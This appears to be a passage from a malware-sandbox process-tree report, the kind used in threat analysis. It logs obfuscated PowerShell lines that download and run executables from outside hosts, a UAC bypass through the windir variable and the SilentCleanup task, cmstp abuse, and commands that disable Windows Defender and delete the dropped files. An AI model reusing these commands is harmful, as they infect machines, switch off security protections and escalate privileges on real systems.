        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4232
      - C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        
        PID:4928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4928 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\873985410469049\\* & exit
        8⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4928
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1368
      - C:\Users\Public\nrp.exe
        
        "C:\Users\Public\nrp.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:180
        
        C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"
        8⤵
        Executes dropped EXE
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Modifies system certificate store
        
        PID:4620
        
        C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\System32\svchost.exe"
        8⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "
        9⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        10⤵
        Modifies registry key
        
        PID:340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
        10⤵
        Modifies registry key
        
        PID:5624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "
        9⤵
        
        PID:5640
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        8⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4592
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fdbd2kvq.inf
        9⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"
        8⤵
        Executes dropped EXE
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"
        8⤵
        Executes dropped EXE
        Windows security modification
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:508
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nrp.exe"
        7⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:3956
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:608
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4432
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4452
    - - C:\Users\Public\xso.exe
        
        "C:\Users\Public\xso.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
      - C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
        
        "{path}"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4808
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4808 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\770191126041014\\* & exit
        9⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4808
        10⤵
        Kills process with taskkill
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "{path}"
        7⤵
        Executes dropped EXE
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "{path}"
        7⤵
        Executes dropped EXE
        
        PID:1468
      - C:\Users\Public\xso.exe
        
        "{path}"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        
        PID:5304
        
        C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"
        8⤵
        Executes dropped EXE
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6060
        
        C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\System32\svchost.exe"
        8⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "
        9⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        10⤵
        Modifies registry key
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
        10⤵
        Modifies registry key
        
        PID:1588
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        10⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        10⤵
        Modifies registry key
        
        PID:2260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "
        9⤵
        
        PID:5728
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        8⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3564
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2k2rvo42.inf
        9⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"
        8⤵
        Executes dropped EXE
        Windows security modification
        
        PID:3596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        9⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xso.exe"
        7⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:192
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4548
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - Delays execution with timeout.exe
    PID:2388
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3552
    - - C:\Users\Public\tnz.exe
        
        "C:\Users\Public\tnz.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3540
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2100

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\e327712778b74a85855d5a9748411b6c /t 3232 /p 3224
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\de5b817df55c49bdb250dbaf57724c42 /t 3232 /p 3224
1⤵
PID:4640

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:4080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\temp\ddad3vxa.exe
  2⤵
  PID:208
- - C:\Windows\temp\ddad3vxa.exe
    C:\Windows\temp\ddad3vxa.exe
    3⤵
    - Executes dropped EXE
    PID:4504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4552
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM cmstp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\temp\ttuqy3sf.exe
  2⤵
  PID:4980
- - C:\Windows\temp\ttuqy3sf.exe
    C:\Windows\temp\ttuqy3sf.exe
    3⤵
    - Executes dropped EXE
    PID:5568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      PID:4364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      4⤵
      PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      PID:1620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      PID:1236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      4⤵
      PID:1616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      PID:4560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      PID:3408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      PID:1212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      PID:3560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      PID:5688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      PID:648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      4⤵
      PID:5824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      PID:4912
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM cmstp.exe /F
  2⤵
